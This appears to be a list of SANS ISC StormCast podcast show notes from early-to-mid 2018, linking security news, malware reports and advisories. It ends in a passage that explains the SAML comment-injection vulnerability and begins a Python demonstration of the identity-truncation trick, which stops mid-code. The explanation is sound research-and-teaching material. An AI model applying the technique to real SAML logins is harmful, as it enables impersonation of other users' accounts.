Analyzing XPS Files https://isc.sans.edu/forums/diary/Analyzing+XPS+files/23804/
WPA3 Standard Finalized https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-wi-fi-certified-wpa3-security
Executing Code with SettingContent-ms Files https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
EFF Analysis of STARTTLS https://www.eff.org/deeplinks/2018/06/technical-deep-dive-starttls-everywhere
6/27/2018 7 minutes, 14 seconds

ISC StormCast for Tuesday, June 26th 2018

Guilty By Association https://isc.sans.edu/forums/diary/Guilty+by+association/23800/
FileZilla and Adware https://forum.filezilla-project.org/viewtopic.php?t=48441
iOS PIN Brute Forcing Confusion https://twitter.com/hackerfantastic/status/1010631766087032832 https://twitter.com/hackerfantastic/status/1010240042990596096
Azure Baseline Security Policy https://cloudblogs.microsoft.com/enterprisemobility/2018/06/22/baseline-security-policy-for-azure-ad-admin-accounts-in-public-preview/
Phone Battery Usage as Keystroke Logger https://sites.google.com/site/silbersteinmark/Home/popets18power.pdf?attredirects=1
6/26/2018 7 minutes, 19 seconds

ISC StormCast for Monday, June 25th 2018

XPS Documents Used for Spam https://isc.sans.edu/forums/diary/XPS+Attachment+Used+for+Phishing/23794/
New Exploit Kit Trends https://researchcenter.paloaltonetworks.com/2018/06/unit42-the-old-and-new-current-trends-in-web-based-threats/ https://blog.malwarebytes.com/cybercrime/2018/06/exploit-kits-spring-2018-review/
Deprecating TLSv1.0 and TLSv1.1 https://datatracker.ietf.org/doc/draft-moriarty-tls-oldversions-diediedie/
Leaky Firebase Installs http://info.appthority.com/-q2-2018-mtr-download-Firebase-vulnerability
6/25/2018 5 minutes, 40 seconds

ISC StormCast for Friday, June 22nd 2018

Fake Fortnite https://blog.malwarebytes.com/cybercrime/2018/06/fake-fortnite-android-links-found-youtube/
Fake WannaCry E-Mails https://twitter.com/actionfrauduk/status/1009803967705092096
Ransomware Installs In Internet Cafes http://hznews.hangzhou.com.cn/shehui/content/2018-06/16/content_7020998.htm
OpenVPN Malicious Configuration Files https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da
Cisco Advisories https://tools.cisco.com/security/center/publicationListing.x
6/22/2018 5 minutes, 50 seconds

ISC StormCast for Thursday, June 21st 2018

Netflix Phishing Sites Using TLS https://isc.sans.edu/forums/diary/Secure+Phishing+Netflix+Phishing+Goes+TLS/23786/
OpenBSD Disables Hyperthreading By Default https://www.mail-archive.com/[email protected]/msg99141.html
Bithumb Cryptocurrency Exchange Breached Again https://www.bleepingcomputer.com/news/security/bithumb-hacked-second-time-in-a-year-hackers-steal-31-million/
Microsoft Edge CORS Bypass via Audio Files https://jakearchibald.com/2018/i-discovered-a-browser-bug/
Microsoft Releases a Special Patch for Oracle Outside-In Libraries https://support.microsoft.com/en-us/help/4092041/description-of-the-security-update-for-microsoft-exchange-server-2013
6/21/2018 6 minutes, 50 seconds

ISC StormCast for Wednesday, June 20th 2018

PowerShell ScriptBlock Logging Bypass in the Wild https://isc.sans.edu/forums/diary/PowerShell+ScriptBlock+Logging+Or+Not/23782/
VirusTotal "False Positive" Alert http://blog.virustotal.com/2018/06/vtmonitor-to-mitigate-false-positives.html
Cloud Environments Exposed to the Internet https://info.lacework.com/hubfs/Containers%20At-Risk_%20A%20Review%20of%2021,000%20Cloud%20Environments.pdf
Google Home DNS Rebinding Attack Reveals Geolocation https://www.tripwire.com/state-of-security/vert/googles-newest-feature-find-my-home
6/19/2018 5 minutes, 31 seconds

ISC StormCast for Tuesday, June 19th 2018

Obfuscated JavaScript Targeting Mobile Devices https://isc.sans.edu/forums/diary/Malicious+JavaScript+Targeting+Mobile+Browsers/23778/
Axis Camera Vulnerabilities https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/
Apple Caches Confidential Data on Unencrypted Drives https://wojciechregula.blog/your-encrypted-photos-in-macos-cache/
Andy Emulator Infected With CryptoMiner https://www.reddit.com/r/emulators/comments/8rj8g5/warning_andy_android_emulator_andyos_andyroid/
6/19/2018 5 minutes, 53 seconds

ISC StormCast for Monday, June 18th 2018

SMTP Strangeness - Possible C2 https://isc.sans.edu/forums/diary/SMTP+Strangeness+Possible+C2/23770/
Encrypted Office Documents https://isc.sans.edu/forums/diary/Encrypted+Office+Documents/23774/
Recent Port 8000 Scans https://www.bleepingcomputer.com/news/security/all-that-port-8000-traffic-this-week-yeah-thats-satori-looking-for-new-bots/
New Clipboard Cryptocoin Stealing Bot https://blog.360totalsecurity.com/en/new-cryptominer-hijacks-your-bitcoin-transaction-over-300000-computers-have-been-attacked/
WebUSB Weakness https://pwnaccelerator.github.io/2018/webusb-yubico-disclosure.html
6/18/2018 6 minutes, 32 seconds

ISC StormCast for Friday, June 15th 2018

Analyzing a Compromised WordPress Site https://isc.sans.edu/forums/diary/A+Bunch+of+Compromized+Wordpress+Sites/23764/
Breaking Bluetooth Low Energy Smart Padlock https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/
WIM Disk Image Vulnerability https://blog.talosintelligence.com/2018/06/vulnerability-spotlight-talos-2018-0545.html
Extracting Timely Sign-In Data from Office 365 Logs https://www.sans.org/reading-room/whitepapers/logging/extracting-timely-sign-in-data-office-365-logs-38435
6/15/2018 12 minutes, 14 seconds

ISC StormCast for Thursday, June 14th 2018

From MikroTik With Love: Yet Another Router Botnet? https://isc.sans.edu/forums/diary/From+Microtik+with+Love/23762/
Using Cortana To Compromise Windows 10 https://securingtomorrow.mcafee.com/mcafee-labs/want-to-break-into-a-locked-windows-10-device-ask-cortana-cve-2018-8140/
Compromised Docker Images https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers
Lazy FPU Save/Restore Allows Malware Access to FPU https://access.redhat.com/solutions/3485131
6/14/2018 5 minutes, 53 seconds

ISC StormCast for Wednesday, June 13th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2018+Patch+Tuesday/23758/
Apple Code Signing Verification Vulnerability https://www.okta.com/security-blog/2018/06/issues-around-third-party-apple-code-signing-checks/
Google Chrome Restricting Inline Extension Install https://blog.chromium.org/2018/06/improving-extension-transparency-for.html
6/13/2018 5 minutes, 50 seconds

ISC StormCast for Tuesday, June 12th 2018

More Malspam Pushing Lokibot https://isc.sans.edu/forums/diary/More+malspam+pushing+Lokibot/23754/
Ethereum JSON RPC Theft https://twitter.com/360Netlab/status/1006065566728085504
CryptoCurrency Miner Plays Hide-and-Seek https://www.bleepingcomputer.com/news/security/cryptocurrency-miner-plays-hide-and-seek-with-popular-games-and-tools/
Apple Outlaws Crypto Currency Miners in App Store https://developer.apple.com/app-store/review/guidelines/#hardware-compatibility
FBI Arrests Suspect in BEC Investigation https://www.fbi.gov/news/stories/international-bec-takedown-061118
6/12/2018 4 minutes, 46 seconds

ISC StormCast for Monday, June 11th 2018

The Seven Properties of Highly Secure Devices https://www.microsoft.com/en-us/research/wp-content/uploads/2017/03/SevenPropertiesofHighlySecureDevices.pdf
Finding Deserialisation Issues With Burp https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/
FTC Starts Looking Into Cryptojacking https://www.consumer.ftc.gov/blog/2018/06/protecting-your-devices-cryptojacking
Drupal Disputes Number of Vulnerable Sites https://groups.drupal.org/node/520149
6/11/2018 5 minutes, 30 seconds

ISC StormCast for Friday, June 8th 2018

Critical Adobe Flash Update https://helpx.adobe.com/security/products/flash-player/apsb18-19.html
SuperMicro Firmware Vulnerability https://blog.eclypsium.com/2018/06/07/firmware-vulnerabilities-in-supermicro-systems/
FOSCAM Video Camera Vulnerabilities https://blog.vdoo.com/2018/06/06/vdoo-has-found-major-vulnerabilities-in-foscam-cameras/
Sofacy Update https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
Automated Twitter Loot Collection https://isc.sans.edu/forums/diary/Automated+twitter+loot+collection/23743/
6/8/2018 5 minutes, 36 seconds

ISC StormCast for Thursday, June 7th 2018

VPNFilter Update https://blog.talosintelligence.com/2018/06/vpnfilter-update.html
Prowli Botnet https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/
Cisco Security Bulletins https://tools.cisco.com/security/center/publicationListing.x
F-Secure RAR Vulnerability https://www.f-secure.com/en/web/labs_global/fsc-2018-2
PCAP to Weblogs https://isc.sans.edu/forums/diary/Converting+PCAP+Web+Traffic+to+Apache+Log/23739/
6/7/2018 5 minutes, 5 seconds

ISC StormCast for Wednesday, June 6th 2018

Analysis of a Post Exploit Script: Malicious Post-Exploitation Batch File
Zip Slip Vulnerability https://snyk.io/research/zip-slip-vulnerability
Redis Exploits https://www.incapsula.com/blog/report-75-of-open-redis-servers-are-infected.html
Drupalgeddon 2 Update https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/
6/6/2018 5 minutes, 41 seconds

ISC StormCast for Tuesday, June 5th 2018

Running Only Signed Code. Does it work in Windows 10? https://isc.sans.edu/forums/diary/Digging+into+Authenticode+Certificates/23731/
Misconfigured G-Suite Mailing Lists https://www.kennasecurity.com/widespread-google-groups-misconfiguration-exposes-sensitive-information/
Microsoft Releases Open Source Post Quantum VPN https://github.com/Microsoft/PQCrypto-VPN
6/5/2018 6 minutes, 2 seconds

ISC StormCast for Monday, June 4th 2018

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Security+Updates/23727/
VPNFilter Makes a Comeback https://jask.com/from-russia-with-love/
Reverse Analysis with Radare2 https://isc.sans.edu/forums/diary/Binary+analysis+with+Radare2/23723/
Pet Location Tracker Vulnerabilities https://threatpost.com/pet-trackers-open-to-mitm-attacks-interception/132291/
6/4/2018 5 minutes, 29 seconds

ISC StormCast for Friday, June 1st 2018

Safely Resetting Routers https://isc.sans.edu/forums/diary/Resetting+Your+Router+the+Paranoid+Right+Way/23719/
CSS mix-blend-mode Side Channel Attack https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/
New ActiveX Exploit Seen in the Wild https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=27263
Apple iMessage Security https://support.apple.com/en-us/HT202303
10 Year Old Vulnerability in Steam Discovered https://www.contextis.com/blog/frag-grenade-a-remote-code-execution-vulnerability-in-the-steam-client
6/1/2018 5 minutes, 45 seconds

ISC StormCast for Thursday, May 31st 2018

Windows JScript Vulnerability https://www.zerodayinitiative.com/advisories/ZDI-18-534/
Two Git Vulnerabilities Patched https://marc.info/?l=git&m=152761328506724&w=2 https://blogs.msdn.microsoft.com/devops/2018/05/29/announcing-the-may-2018-git-security-vulnerability/
SpamCannibal Blacklist Temporarily Marks All IPs as "Spam" https://twitter.com/GossiTheDog/status/1001778042400854016
QRadar Remote Code Execution https://blogs.securiteam.com/index.php/archives/3689
5/31/2018 4 minutes, 45 seconds

ISC StormCast for Wednesday, May 30th 2018

New DNS Features https://isc.sans.edu/forums/diary/DNS+is+Changing+Are+you+Ready/23711/
Apple Updates https://support.apple.com/en-us/HT201222
Scans For Misconfigured EOS Blockchain Nodes https://www.bleepingcomputer.com/news/security/misconfigured-eos-blockchain-nodes-under-attack/
NPM Bug Causes Update Failures / Application Crashes https://github.com/npm/npm/issues/20791#issuecomment-392648459
MnuBot Exfiltrates Data Via MSSQL https://securityintelligence.com/new-banking-trojan-mnubot-discovered-by-ibm-x-force-research/
5/29/2018 6 minutes, 6 seconds

ISC StormCast for Tuesday, May 29th 2018

Ultrasound Mobile Location Tracking https://isc.sans.edu/forums/diary/Do+you+hear+Laurel+or+Yanny+or+is+it+OnOff+Keying/23707/
Analyzing Malware Created with NSIS https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/
Obfuscated Word Macro https://isc.sans.edu/forums/diary/Antivirus+Evasion+Easy+as+123/23701/
Z-Wave Attacks https://www.pentestpartners.com/security-blog/z-shave-exploiting-z-wave-downgrade-attacks/ https://www.silabs.com/community/blog.entry.html/2018/05/23/tl_dr_your_door_is-g1zC
Electron Framework Protocol Handler Patch Bypass https://blog.doyensec.com/2018/05/24/electron-win-protocol-handler-bug-bypass.html
5/29/2018 5 minutes, 56 seconds

ISC StormCast for Friday, May 25th 2018

GDPR Going Into Effect May 25th https://en.wikipedia.org/wiki/General_Data_Protection_Regulation
Bitcoin Gold Double Spend Attack https://forum.bitcoingold.org/t/double-spend-attack-on-exchanges/1362
Amazon Alexa Forwards Random Conversations https://www.kiro7.com/news/local/woman-says-her-amazon-device-recorded-private-conversation-sent-it-out-to-random-contact/755507974
Verge Crypto Coin Attacked Again https://www.bleepingcomputer.com/news/security/verge-cryptocurrency-network-falls-victim-to-same-attack-even-after-hard-fork/
5/25/2018 4 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, May 24th 2018

VPNFilter Malware Affecting Cisco Routers https://blog.talosintelligence.com/2018/05/VPNFilter.html DLink Vulnerabilities https://securelist.com/backdoors-in-d-links-backyard/85530/ Firefox Disabling "Spy APIs" and enabling 2FA https://www.fxsitecompat.com/en-CA/docs/2018/ambient-light-and-proximity-sensor-apis-have-been-disabled/
5/24/2018 (5 minutes, 35 seconds)

ISC StormCast for Wednesday, May 23rd 2018

Malicious SYLK Files Used to Execute Code in Excel https://isc.sans.edu/forums/diary/Malware+Distributed+via+slk+Files/23687/ BMW Releases Patches for Several Cars https://keenlab.tencent.com/en/Experimental_Security_Assessment_of_BMW_Cars_by_KeenLab.pdf Mac Crypto Miners https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2018/05/new-mac-cryptominer-uses-xmrig/ VMWare Spectre Updates https://www.vmware.com/security/advisories/VMSA-2018-0012.html
5/23/2018 (4 minutes, 50 seconds)

ISC StormCast for Tuesday, May 22nd 2018

Spectre NG Patches https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://newsroom.intel.com/editorials/addressing-new-research-for-side-channel-analysis/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180012 https://bugs.chromium.org/p/project-zero/issues/detail?id=1528 New "Moon" Variant http://blog.netlab.360.com/gpon-exploit-in-the-wild-iv-themoon-botnet-join-in-with-a-0day/ https://isc.sans.edu/forums/diary/Something+Wicked+this+way+comes/23681/ Extracting Keys From Windows ssh-agent https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/
5/22/2018 (5 minutes, 27 seconds)

ISC StormCast for Monday, May 21st 2018

Redis Cryptocoin Mining Worm https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/ Evolving Chrome's Security Indicator https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html DrayTek CSRF 0-Day Exploited to Change DNS Servers https://www.draytek.co.uk/support/security-advisories/kb-advisory-csrf-and-dns-dhcp-web-attacks Rowhammer Remote Exploit https://www.cs.vu.nl/~herbertb/download/papers/throwhammer_atc18.pdf https://arxiv.org/abs/1805.04956
5/21/2018 (5 minutes, 46 seconds)

ISC StormCast for Friday, May 18th 2018

Claymore Miner Attack https://isc.sans.edu/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/ PCI DSS Version 3.2.1 Released https://isc.sans.edu/forums/diary/PCI+DSS+version+321+is+out/23667/ Keeper Releases Update https://keepersecurity.com/blog/2018/05/15/response-may-15-seclists-report/ Cisco Security Update https://tools.cisco.com/security/center/publicationListing.x
5/18/2018 (5 minutes, 42 seconds)

ISC StormCast for Thursday, May 17th 2018

Critical DHCP Client Vulnerability in RedHat Enterprise Server 6/7 https://access.redhat.com/security/vulnerabilities/3442151 UPnP Misconfiguration DDoS Attack https://www.theregister.co.uk/2018/05/16/upnp_amplifies_ddos_attacks/ Ubuntu Snap Store Miner Incident Followup https://blog.ubuntu.com/2018/05/15/trust-and-security-in-the-snap-store iOS / Android "Zipper Down" Vulnerability https://zipperdown.org/
5/16/2018 (6 minutes, 27 seconds)

ISC StormCast for Wednesday, May 16th 2018

PDF Exploit (and Windows Priv. Escalation) Leaked https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/ Possible Vulnerability in Keeper Password Manager http://seclists.org/fulldisclosure/2018/May/41 MyEtherWallet Phishing https://isc.sans.edu/forums/diary/Phishing+emails+for+fake+MyEtherWallet+login+page/23655/
5/16/2018 (6 minutes, 56 seconds)

ISC StormCast for Tuesday, May 15th 2018

PGP/SMIME efail Vulnerability https://efail.de Adobe PDF Reader / Acrobat Bulletins https://helpx.adobe.com/security/products/acrobat/apsb18-09.html
5/15/2018 (6 minutes, 31 seconds)

ISC StormCast for Monday, May 14th 2018

Odd njRat Like Scans Reversed C2 traffic from China Signal Vulnerability (Possibly in Electron, which affects Skype/Slack/others) https://twitter.com/ortegaalfredo/status/995017143002509313 Electron Vulnerability https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/ Cryptocoin Miner Found in Ubuntu Snap Store https://github.com/canonical-websites/snapcraft.io/issues/651
5/14/2018 (5 minutes, 53 seconds)

ISC StormCast for Friday, May 11th 2018

DNS Exfiltration in Windows https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/ Fake Electrum Wallet https://github.com/spesmilo/electrum-docs/blob/master/decompiling_guide.md Treasure Hunter PoS Malware Source Code Leaked https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/ More Malicious Chrome Extensions Spreading via Facebook https://blog.radware.com/security/2018/05/nigelthorn-malware-abuses-chrome-extensions/
5/11/2018 (5 minutes, 14 seconds)

ISC StormCast for Thursday, May 10th 2018

Lloyds Bank Phish Leads to Trickbot https://isc.sans.edu/forums/diary/Nice+Phishing+Sample+Delivering+Trickbot/23641/ Firefox Group Policy Engine https://www.bleepingcomputer.com/news/software/group-policy-support-coming-to-firefox-60/ OS Vendors Fix Intel Debug Flaw https://www.kb.cert.org/vuls/id/631579 Cryptocoin Miner in Excel https://charles.dardaman.com/js_coinhive_in_excel
5/10/2018 (4 minutes, 1 second)

ISC StormCast for Wednesday, May 9th 2018

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2018+Patch+Tuesday/23637/ Basestriker Vulnerability Hitting Office 365 https://www.avanan.com/resources/basestriker-vulnerability-office-365 wget Cookie Injection Vulnerability http://seclists.org/fulldisclosure/2018/May/20
5/9/2018 (6 minutes, 21 seconds)

ISC StormCast for Tuesday, May 8th 2018

Parsing Windows Job Files https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ SynAck Ransomware Uses Doppelganging Technique https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/ More Drupal Compromises https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/ Russia vs. Telegram https://twitter.com/instasegv/status/993521755192020992 https://www.bleepingcomputer.com/news/government/russia-blocks-50-vpns-and-proxy-services-providing-access-to-telegram/
5/8/2018 (4 minutes, 51 seconds)

ISC StormCast for Monday, May 7th 2018

Malicious NPM Library Stopped https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies Popular GDPR Shield http://gdpr-shield.io (currently down) More Spectre Flaws https://www.heise.de/ct/artikel/Exclusive-Spectre-NG-Multiple-new-Intel-CPU-flaws-revealed-several-serious-4040648.html
5/7/2018 (5 minutes, 20 seconds)

ISC StormCast for Friday, May 4th 2018

More WebLogic Exploits https://isc.sans.edu/forums/diary/WebLogic+Exploited+in+the+Wild+Again/23617/ Ouch! GDPR Newsletter https://www.sans.org/security-awareness-training/ouch-newsletter GitHub / Twitter Password Storage Issues https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html https://www.zdnet.com/article/github-says-bug-exposed-account-passwords/ Facebook adds Homoglyph Alert to Certificate Transparency log monitoring https://www.facebook.com/notes/protect-the-graph/phishing-domain-detection/2037453483161459/ Disrupting the Empire: Identifying PowerShell Empire Command and Control Activity https://www.sans.org/reading-room/whitepapers/forensics/disrupting-empire-identifying-powershell-empire-command-control-activity-38315
5/4/2018 (14 minutes, 48 seconds)

ISC StormCast for Thursday, May 3rd 2018

GPS Jamming Becoming More Common https://www.avweb.com/avwebflash/news/GPS-Jamming-Major-Threat-to-Drone-230749-1.html https://www.heise.de/newsticker/meldung/GPS-unter-Beschuss-Jamming-und-Spoofing-nehmen-zu-4038137.html Windows Command Line References https://isc.sans.edu/forums/diary/Windows+Commands+Reference+An+InfoSec+Must+Have/23613/ LoJack Laptop Anti-Theft Software "Phones Home" to Russia https://asert.arbornetworks.com/lojack-becomes-a-double-agent/ Google Maps Can Be Used as a URL Shortener https://nakedsecurity.sophos.com/2018/05/01/google-maps-open-redirect-flaw-abused-by-spammers/ Retrieving DVR Credentials via "Admin Cookie" https://github.com/ezelf/CVE-2018-9995_dvr_credentials
5/3/2018 (6 minutes, 2 seconds)

ISC StormCast for Wednesday, May 2nd 2018

Creating Malicious Office Documents https://isc.sans.edu/forums/diary/Diving+into+a+Simple+Maldoc+Generator/23609/ Google (and Amazon) Disable Domain Fronting https://arstechnica.com/information-technology/2018/04/google-disables-domain-fronting-capability-used-to-evade-censors/ Google Chrome To Enforce Certificate Transparency https://groups.google.com/a/chromium.org/forum/#!msg/ct-policy/wHILiYf31DE/iMFmpMEkAQAJ
5/2/2018 (5 minutes, 34 seconds)

ISC StormCast for Tuesday, May 1st 2018

April WebLogic Patch Incomplete and Intense Scanning for WebLogic Under Way https://www.bleepingcomputer.com/news/security/hackers-scan-the-web-for-vulnerable-weblogic-servers-after-oracle-botches-patch/ Facex Worm Spreads Malicious Chrome Extensions via Facebook https://blog.trendmicro.com/trendlabs-security-intelligence/facexworm-targets-cryptocurrency-trading-platforms-abuses-facebook-messenger-for-propagation/ $15 DTV Transmitter as an SDR https://hackernoon.com/osmo-fl2k-a-15-dtv-transmitter-fm-radio-hijack-and-gps-spoofing-device-68ac08ba7d76
5/1/2018 (5 minutes, 40 seconds)

ISC StormCast for Monday, April 30th 2018

A Few Sample #Drupal Exploits including CVE-2018-7602 https://isc.sans.edu/forums/diary/More+Threat+Hunting+with+User+Agent+and+Drupal+Exploits/23597/ Triggering SMB Connections to Steal NTLM Credentials via PDFs https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/ NTFS Crash DoS Exploit Published for Windows 10 and 7 https://github.com/mtivadar/windows10_ntfs_crash_dos Apple HomeKit / Secure Element Problems https://www.youtube.com/watch?v=1CNAMgctAp0 Azucar Assessing Azure Security https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/introducing-azucar/
4/30/2018 (6 minutes, 33 seconds)

ISC StormCast for Friday, April 27th 2018

HP iLO Ransomware https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/ Total Meltdown Exploit Available https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ WD My Cloud EX2 Access Control Bypass https://www.trustwave.com/Resources/SpiderLabs-Blog/WD-My-Cloud-EX2-Serves-Your-Files-to-Anyone/ Hyperoptic ZTE Home Router Hardcoded Account https://www.contextis.com/resources/advisories/hyperoptic-zte-home-routers
4/27/2018 (7 minutes, 12 seconds)

ISC StormCast for Thursday, April 26th 2018

New Drupal Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2018-004 Malicious Network Traffic From /bin/bash https://isc.sans.edu/forums/diary/Malicious+Network+Traffic+From+binbash/23591/ Insecure Hotel Locks https://safeandsavvy.f-secure.com/2018/04/25/researchers-find-way-to-generate-master-keys-to-hotels/ Amazon Echo As Eavesdropping Device (sign-in required) https://info.checkmarx.com/wp-alexa
4/26/2018 (5 minutes, 21 seconds)

ISC StormCast for Monday, March 12th 2018

Paying For Ransomware Often Fails to Recover Files https://cyber-edge.com/cdr/#about-this-report MikroTik Router Malware Infects Sysadmin PCs https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf CNNVD Held Back Vulnerabilities https://www.recordedfuture.com/chinese-mss-vulnerability-influence/ Keeper Exposes S3 Bucket http://www.zdnet.com/article/password-manager-maker-keeper-hit-by-another-security-snafu/ https://keepersecurity.com/blog/2018/03/10/keepers-response-zdnets-article-regarding-s3-bucket-configuration-issue/ Chip and Pin Clones https://www.kaspersky.com/blog/chip-n-pin-cloning/21502/
3/12/2018 (7 minutes, 34 seconds)

ISC StormCast for Friday, March 9th 2018

Apache Solr Vulnerability used to Install Cryptocoin Miner https://isc.sans.edu/forums/diary/Apache+SOLR+the+new+target+for+cryptominers/23425/ CRIMEB4NK IRC Bot https://isc.sans.edu/forums/diary/CRIMEB4NK+IRC+Bot/23423/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Any.Run Malware Analysis Tool https://any.run
3/9/2018 (6 minutes, 5 seconds)

ISC StormCast for Thursday, March 8th 2018

Ransomware News: GlobeImposter Gets A Facelift, GandCrab is Still Out there https://isc.sans.edu/forums/diary/Ransomware+news+GlobeImposter+gets+a+facelift+GandCrab+is+still+out+there/23417/ How to Break Encryption https://blog.malwarebytes.com/threat-analysis/2018/03/encryption-101-how-to-break-encryption/ Bypassing Adobe Flash Security Protections https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-flash-protection-mechanism/ Hundreds of Bitcoin Mining Servers Stolen in Iceland https://www.theguardian.com/world/2018/mar/07/hundreds-of-bitcoin-mining-servers-stolen-in-iceland Several Android Mail Apps Send Password To Developer (article in German) https://www.kuketz-blog.de/mail-apps-zahlreiche-android-apps-uebermitteln-login-passwort/
3/8/2018 (5 minutes, 49 seconds)

ISC StormCast for Wednesday, March 7th 2018

Exploit for CVE-2018-6789 https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/ Microsoft Fixes USB Issues Introduced By February Patches https://support.microsoft.com/en-us/help/4090913/march5-2018kb4090913osbuild16299-251 123 Reg Loses Backups https://www.bleepingcomputer.com/news/business/123-reg-backup-snafu-causes-clients-to-lose-files-since-august-2017/ Android March Security Bulletin https://source.android.com/security/bulletin/2018-03-01#media-framework
3/7/2018 (5 minutes, 49 seconds)

ISC StormCast for Tuesday, March 6th 2018

Malicious Bash Script with Multiple Features https://isc.sans.edu/forums/diary/Malicious+Bash+Script+with+Multiple+Features/23411/ More Memcached DDoS Attacks https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/ Spring Framework Vulnerability https://lgtm.com/blog/spring_data_rest_CVE-2017-8046 LTE Vulnerabilities http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE_NDSS18_paper.pdf
3/6/2018 (6 minutes, 49 seconds)

ISC StormCast for Monday, March 5th 2018

Protective Malicious Monero Crypto Coin Miners https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407/ memcached DDoS Attacks Ask For Ransom https://blogs.akamai.com/2018/03/memcached-now-with-extortion.html Cheap Android Trojans Come PreInstalled With Banking Malware https://news.drweb.com/show/?lng=en&i=11749&c=5 RedDrop Android Malware Installed via 3rd Party App Stores https://www.wandera.com/blog/reddrop-malware/
3/5/2018 (5 minutes, 30 seconds)

ISC StormCast for Friday, March 2nd 2018

Censoring Images At Scale in #WeChat https://isc.sans.edu/forums/diary/Why+Does+Emperor+Xi+Dislike+Winnie+the+Pooh+and+Scrambled+Eggs/23395/ Trustico Update: Certificate Revocation List Monitor https://isc.sans.edu/crls.html Memcached Update: Github Attack https://githubengineering.com/ddos-incident-report/ http://powerofcommunity.net/poc2017/shengbao.pdf Microsoft Releases Intel Spectre Microcode Updates https://support.microsoft.com/en-us/help/4090007/intel-microcode-updates
3/2/2018 (8 minutes, 1 second)

ISC StormCast for Thursday, March 1st 2018

How Did This Memcache Thing Happen? https://isc.sans.edu/forums/diary/How+did+this+Memcache+thing+happen/23391/ Trustico TLS Certificate Revocation https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wxX4Yv0E3Mk/QZt8UPhKAwAJ Flash on Its Way Out https://www.bleepingcomputer.com/news/security/google-chrome-flash-usage-declines-from-80-percent-in-2014-to-under-8-percent-today/ DNSSEC Is Getting Better But Still Struggling http://www.theregister.co.uk/2018/02/28/dutch_name_authority_dnssec_validation_errors_can_be_eliminated/ Smart TV Firmware Flaws https://www.av-comparatives.org/wp-content/uploads/2018/02/avc_sigma_medion_201802.pdf
3/1/2018 (6 minutes, 8 seconds)

ISC StormCast for Wednesday, February 28th 2018

Memcached Servers Used in Reflective DDoS Attacks
https://isc.sans.edu/forums/diary/Why+we+Dont+Deserve+the+Internet+Memcached+Reflected+DDoS+Attacks/23389/
Malspam Pushing Formbook Info Stealer
https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/
Various SAML Parsers Affected by Comment Parsing Vulnerability
https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
2/28/2018, 5 minutes, 48 seconds
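The Duo disclosure linked above concerns how a SAML service provider extracts the NameID string once an XML comment has been spliced into it: XML canonicalization, as used for the XML-DSig signature check, omits comments by default, so a tampered assertion still verifies, while a text extraction that reads only the first text node returns a truncated identity. The Python below is an added illustration of that parsing difference on a constructed assertion fragment; it is not code from the podcast, from Duo or from any SAML library, and which real libraries were affected is covered in the linked post. It assumes an attacker who holds an account whose identifier begins with the victim's and who can edit the assertion as it passes through their own browser.

```python
"""Added illustration: how an XML comment spliced into a SAML NameID changes
the identity a service provider extracts, depending on how it reads the text.
The assertion fragments are constructed, not real IdP responses."""
from xml.dom import minidom

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed: the attacker's own NameID is admin@example.com.attacker.example;
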